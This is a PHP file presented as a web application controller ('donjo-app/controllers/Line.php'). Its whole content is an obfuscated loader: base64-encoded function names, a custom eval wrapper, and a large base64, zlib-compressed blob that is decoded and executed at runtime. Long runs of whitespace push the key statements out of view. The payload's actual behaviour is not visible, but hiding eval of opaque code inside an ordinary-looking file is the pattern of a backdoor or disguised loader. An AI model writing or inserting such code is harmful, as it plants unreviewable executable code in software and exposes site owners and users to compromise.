<?php 
        $__='printf';$_='Loading donjo-app/controllers/Line.php';
        



























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXNly29aWfU9V/0MebpXuLXcnACnaZrn8QEAECJCiRIAYX1IYJBDEQEScRH79XfsA4CRKlt1J53aKx0EUYTjD3muvPZwT//xz2f7xG9rXq+IpzhePV1/Yr1X7ehXO8unsf7yi+DWY5YunWZo+PM1/HcT5wy/FpPhZTL35/Jdffrn68lPV28//9dPlz9/nz08Eh5//wPb1xZ0rm2/PHYuPXbn79Yrd2qPpXa2C7NefL+3SLu3S/p7tKshMLrTVpSKbDcdaz1Sp/Whvkk8laYI1S7r+7SKqS7u0S7u0S7u0S7u0S7u0/2/tUs64tEu7tEv7+7Yr35s/fLz+LXwIZuHD1ZeLRC7t0i7t0i7t0v5X7fgcgxjNVv1oFrErFmTPek4VOV16uhA7Vlg41nXkytLGG8/6isiuaNwUUj8dqlpn993Ys4eca3GRZ7Uyv6kuHHtYKLKWBo1uFDTNhZOZG6WH3zOV93AvtFpcaM0j38Izq8A9aVm9vxtnZAtzz1pMgkZCc1gqveEqtNWpqwtTv6HV80w8Wy18Od0qsor+NbyP+bL+nougYS7pe40XbhXJ2Ypx53e6lO5k4m2EG88WOEfvbG5vOi1F5KLbaed5qAs3foOPsZZUkdBno80H2TBVuukyaGpF2DM5z2ovFXEyC3va+i7+vPJ7WEduLt3GYuXb5tKzMY9Na+nao1V/xGSkOFjvqJGuQ7lbjhN3FsqNsr6djiJDNjce5BT0zDnJXJPNraMLXQ86CGVprkh72fXlCRf2hC0bl3SRMbktPWtU7Nen4X448WOh8DOSXxq7kFMpl/SjZ13PIc/UgawwTh5kEufZt3NFXqSBLCW4t/UsaY2f6xDzebCkpbsRFq7VShxbmITygvreOtYz+peWbEwZa8ZYAdbiWK0cY3HQAY/nT7WuGJ6ydA4dJn5jwUP/S6xvi2cc5vfkWCmniFF8qHvdahVKnGC+eLdnoi+toDF8WXoK8Y5fYpDDmDTf2LEZBpYDkfVJWOSh6xnJ/wB30FXI5uaQLGQ+9fN0AhzRd7TOPLTUiSeyOa+oz1Av109YD7I0DoFxkuegw8anMTFHDX1qNN7asbQJZNxybHUSikIp/6bJ3e3tbeTS+Q7chwxmoUW6YbiclrgEtnWStbQl2ULe65fvM12S3RX0bZCbWyafhrnBO0+V/QJTHLMp3OdIr5gXWys9r9a2s3fIFjpJSd9CABvCGkk/KnC0VLoqdMywUOOjRbpm8svCGbDBBxs2Z76+B06Z4CfNpZyDXPIB2YjXM3cYhU7m1JcLTBIOQ5npm57PIXPoB5zSldaY9xPjly5h6nrHF0bX1EdGq6dzkqF0n81xIg3wzp0OO9LNoaR1UwHP7hRRHWuGKmicpI4N6W6kC4LWle4soxtD9wb6GOFef2TwKvq4w5j0+8g0gJOuKujGPDIxlsFjPHMUoQ8T/9wxG5A0yQA3GolkDKBfzWiZ4246Rh8GOqA5DjUjFMZJEOldmh/elTRBkYbC2OhGBmcORsazin5UjT1X0Z+G9yEJrE3pFoLJSWLZ322kc8+YD4d5LfCeOR4ZC2EcC4LZlcySBxYS3u/rWC/dN7AWrCMamZpgbNj8gFjzbmSwdbI5jruQS9JysWZDM1XMJzVIBljHYGQO1VKme7mPesLEaSwmbsOIFFG4J/wYXNotxwcWbG3mNxU860SmnC4UiTgrTH3Yl58FpT9JdtwfjeThKuilG3DfDHZzypvrO73izbGB+21gCVjVBd21d/5BBVbAZxoPHK/8uDPzehoX3MxWgwb4yFJ5wiM4Hj9TzrFvl35mcoNN8p7x/zTehqzAeQznKclqN+dm2Aw3rdzPjSV8a441FA7za+Z20AjXvtiahTIPDISjsShYt2vGLR2yb2/TYXJXDsZ2GykHu4sH2XDl6+2dvgZcG/zSGuvGqNbtSowKPoBewcdru8uvXNmcB/zzLfONxEtd4n9zSP7Yv5n3RazJJX1Yo5nKqQLwPALWFHWTRI+9deTakyIUo3ycfSaftHGtIQcumoJP15A1cDRMg+ZtBL8y95th6opBcbee9Z3G84Tuj2Wm6/ShR/5Nw/hS4lvp0uawllzb+I3nuWsr/QfIgNYNvcSQw1QRtQXmyPtSm3ENk8kNF6mkB8uE75CW6nbeZ/d7Au9kkPGmkyB2ie0G1g392g3im05bEUOSUw7e5IkLB7YArurmd7sxwc/wp5hn4eejSO2Bj8XObszb6W4ccKALrjSIv+H3tDV8RUrf4Hlbuel+Ai7IptaQTwPjsZgnFDsJcL129bLPex02sZ6dzF3I4OumJf6FR7tB8oHfys0p5F9U/Vb9lxf8PvTR4u6mxYv367WVWEq3I/i9vhjG0Gs9xzZiyWOZyy7sa1jGSqQ32bzui8lHpeeugPlqvpUsyiuBr6J4rK1I85zWqG467fuY1jspgg33ge4NxE5erj+I7sfXJN8ZYpfFPXCHsbnBGD7EBv6aFCcYeV/v/Hq/Oe7D1dcR6bGSdw69fID8OQ9rw/fQm8CHIvfBhb/sH7x32lctM5pT/d92owA2020191zluSM5e5YT9UUtIb9rbULwlJDiHawFeNwqGONYL+W1e7+ai/boZRRn3uY2yevIDmcfmQ2KUSlPc76bG8YpsD74fX6i3Hz+VRGD/Ei3Pe6lPuj7JmKEnrll89QFn9mhUfIB8HI75oaDUoah4EHubhzMT+cE/3X4nuEhPkKsU70fhjsMs0toeJbZhOwnrswXftxau1j/IKM+DXBmK3HtKB/sMPNeHGoUm8DeVfDE7Yxic3r34RjfGWLQnY4x1jq0R4Svrd2QfnfsyWOQmc+hZW7JNl7R186WYZ9n+gpT4sGdXsCP99vPeyzniCeh35A49WXfDDOMv34E++MzffbUFPrdgCsYziAjyM7cwl7Rdzvrn+gybEzg18wR1sjm39+vl/DV9OAXXZPNYcb4TzaKWtanF96HjjXkXOSbr2cqfIAHHxc0R9CvsCV9edZt5CK/crAuv3FN9rPxm0Fxwh8nlwBcdWZOyVUzyPgb71c8WB8nFIPPlb6isEdy42IH60asE/vNKFbk1sS3jLaSpQn4MrZ4Lga3TZALpve6kisicZO6CpneR9EAXKDEnz/s/Mz5Obdf6ru8/w35qRRPPHSHLBf145rjX1zQp5S4+/dyx1ogvg8oH0QspJ34js6sXAPxNst7KPb/9Erf7FKRd1DeBtzn31jroX749+qn7n8wJb58niC2AQadthIHkDFyJ7MNbJjwv1Hus3ihrEmomzW4l0f+0E7o2WCDNUvzJMjaTchwXWOZOKW6V7gSB/vuEBag7+Ececf2XlfjUEbelGvw/SHsFP4CcWz5+3ChQDaQHefLwEZqIq+K4vvpc3HwfYYYERefIgbilOn150Ej+XAvtifkL474+PQCP78l+8q3kG2AQ5jdMb9ywtf6mGsb53nrBddMvCZyLfG6TfaAec9gH1mNb6eRggvbiLNh541jbq7k9mvNcfc66edAtiJ7npWcxLH+TuZ5o3fTW018Rf5ZQHH3Bjkq4iKV82N+6+vIM8A3Ie7hPR1zmXqUJ4tHY5f+j+xzo0Sl/+ApX5iTjRvAONaFvLNzZMN+Ji2cCguv6DMGhrZ/uD5l5Oqw01APinfprPJf1VprX/EiRjCS9r0pJse+74+1u4mXSdfwmYkrtbehpT6W92F3NUbBna/aF/QLn4BY2njFtrSJX9ZoBhQbu432BvE5dEr91f0TR3cr7i1924D8lNXmSNduJs2R38RlXNBdhHI7dxsMO5QvTHxxjw/olnwr1jssn3XV1YP4Ej+mDJxk0gy5N/o0c3BP8Qb+PtzLSVTlN/AlLuTqYo7CPLRvgbP1yhsTnrqImYJv6/4beDqDD8SqzNcn5zBSx2zv44oyZiz9SWdJ/H+PnNlDbOFOuZjpRR4WdhP2BH2B8+eURyKmWzmNOfn6wse6aey+GKyIr61NzWWIh3IWXxxhx9aTorbjvQyJC4TY3fBLx3Zbh9yww04iPeG/M1YPhb16VFNGPhtsCRPdCNcCfmLqQT9q1oqDZucT7LkgfTiUc2y/7aceR7NvvnPE14j3WFyKWOEMZ//5ekB8Va4Z9imnC/Aqxgavbz6TbvyaB4nPWWwqrg/iGy3s60ltZztZkt1C/vnAak3CPDmwY2FnL+MMcXn32/pATAJsDJ++i1/fjKneo6cfiyFf58rbHdd82y5ggzLx6Z+hDx5xS5tqA8S1i6CB2FXc60SXpTXxz3fy4tRvtDLPVhcDq577a/ymbcD1s4H1+bs47hu62risJnNdy//TD8TSLCYbNdrz0OJJ5zt+JD5ieXCZUy5rDu2PZ3R/41EdvKwjvNuekYNHKp9OgIGP+5w4eCN2NxPo6DBXWsFmN++fG3KankL3WowHczcNECcC3/OBJQF34fIuFhaYR4LnnxSZcBIW/nQW3d7M4ZPbG8x/M7CAs5628tH/kb/NtRS+b844uSlcn/i93xEHIg9l/j46eQbsPK+CuIqv4jdkkKuTkKvyl/x2Zm1CFqOSDI5zx07uQI9+U8nhJ17BDeI6S3pCzFKc1kGOamN1Ttgbzvxm+Di86eCF99Yc3FWQccijqpy+rO2RH6MYmOLq/JU6RF1n4/d1topfTusErJ9dDv6pns9J7aiUE8/tn1ENga/jqGPbU8taiV/F9VRn2j2714VlaD3Pj7l3Nw7LtxD3VTlkGNI4r+QKW9dWOaa7F2tKjtdRxS1ULz/Hwfv5Mts/mW8nN8+s8WTejHdP5XNitxnlN32mu4Twvhohb3TsZNYfvzUnwgD/6FglJqo62rmYmQ/YN8Zr8VBdo6x1XeKI8tSj8feYPFkjOL5T1gz39U66dyzrfT3ozTqcCz7wy3ie9b+bw85+aP9YnZ/WbxyrmDxIbapbPJY1dtbf7LQOTrXts7bxHVhTsmOsDXLk/FVO+qgrxSsY3tVl38BCmZ+e1Oj2XOEWrh0A6+UexSBn+wTL49yIccMP1DHTJdvjFSfVHsPOZt6orwtFwO1zyXPr1isZneL4sIYZZuQnaI89mZ2pP6795pC48c3+qzp2XZNm/e/2H46/K/PXV3z+2dpqLqzA/9+o/0e78U7sttSDUcm32odwdeCq5suynnliL9rm4VxsfpJPOU01dViMdyyPc9wRMF+P95vaY0h7dlQvbppTp2FuA4rRKV4g2chUg6rPv0ygl3RengGgmFFaEm/8UJ2m+r3Mr1ymh/pZKZNjn/QIPsOapp7YmWn2ZOraQnVOBus9JxuKZ/n2wkXO71ghxb2IRVTEAIxP0rKWrQ33z08xVcV8FtaamdNQajcRG82O+zmVEXiMzmn8FfKpeGwXw57fq6v5/yBegG+U04RiuTBrF27nO2OF0geZVb+nNnToBxp0nsdl53GiV+2qr7/Vv+kj7qtz9drP7OOS4xiG1Sdfse0T/ySkh3sM57jFtFl9Jz3l7pIjXu57hD21dS6OOOH4ci9Dn8CHp0m9Hwl+nVf7h9X+TXl/tweoU2xgrolLiGvKfbT69zN5CeWC1X643aSzAxH4a8hX++EsljUZpoQcY0Iv7DzRjM7B+CKdgRtSrABup1zxXC5Z7r/SPhPlhPfNen+Jq2qcuzjyRU223r85iY9hM1hTI4r6XfManLSu9gsSrO9MTZHimPDRt8BdDSmneAfz31BsznyfXu61jvfPi/dy4kE/pzLKwRuTv0g+74qDCGNu6Q+O4znCv9zifXldIB9r+MDeuT372oaO/POb/m0fA3jV2YqDZ1yQn9UdO+8xttqJa60/3tG5lSblewf+H/Ye2CbdZ3ZC+2HMr9OeJuOuP96/eWWNguLkc3F0wfbDsEamo227lm+7yld3MSbpWy33SupnJd+cxNPADfhtOFPEifQgwy57pQ5V6P4cjyAvz+0GD5kM6WwU/Iq5gY9huTq+KfeAu/vn/ffywmE/fKl/OjMHPdBPYH5NZ2uqs3j/WXgv64t7bJLtUz73FsZhuzcO1TqaiOVOYrXqHMy3fMX3YzwPZ+CVtI/4D/Or6zosz8IYOx8NX3NQHyIfcNJP8nw/4hbhn4F/P2svHWuBGMuls5UXOzhvB0u/gVyLzphki/84/q9r2i/5/4fzuJdnQ/L6HMYrdZV35i7lmQ+GecyvOnslsz2Yg1iH4qRd3bO0m1f2lOw/Iw6y9vsIl7znfN7zV3DGy5rG7ozkYe5zkH/QWXZ18sDqAu0tq2uwfQ6pdfbsYl1zkc7U4BpsDzinnAL8DD7gV0GKPulcvtR+gr54OtvGfEyPchyKYcpvgNH5y3phWNWxSxsADy/8pkp1rA1w8OhRLEz7ECwf01g9BDZTfROGfX39co7Nsm5e+ZC4OjNPNl6un9Uh6CzJ+rU5VfXzck4heNDPugfrqfYJ6Pxf5wBLEvfpnbp56Vdjdr71HD/t9mH6h7W8MRfdIje435z4yFS9H/Oj6O6F7xwquvHcrbH/OCowx69fr7789NP//f8w9ZX9/Gf127++fM/nB9++58N/7Af85xX9++q/d8Ne/j7Zv+ffJ3us+38ega1U/b++/BsPxgR1';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































                                                                                                                                                                                                                     $________;
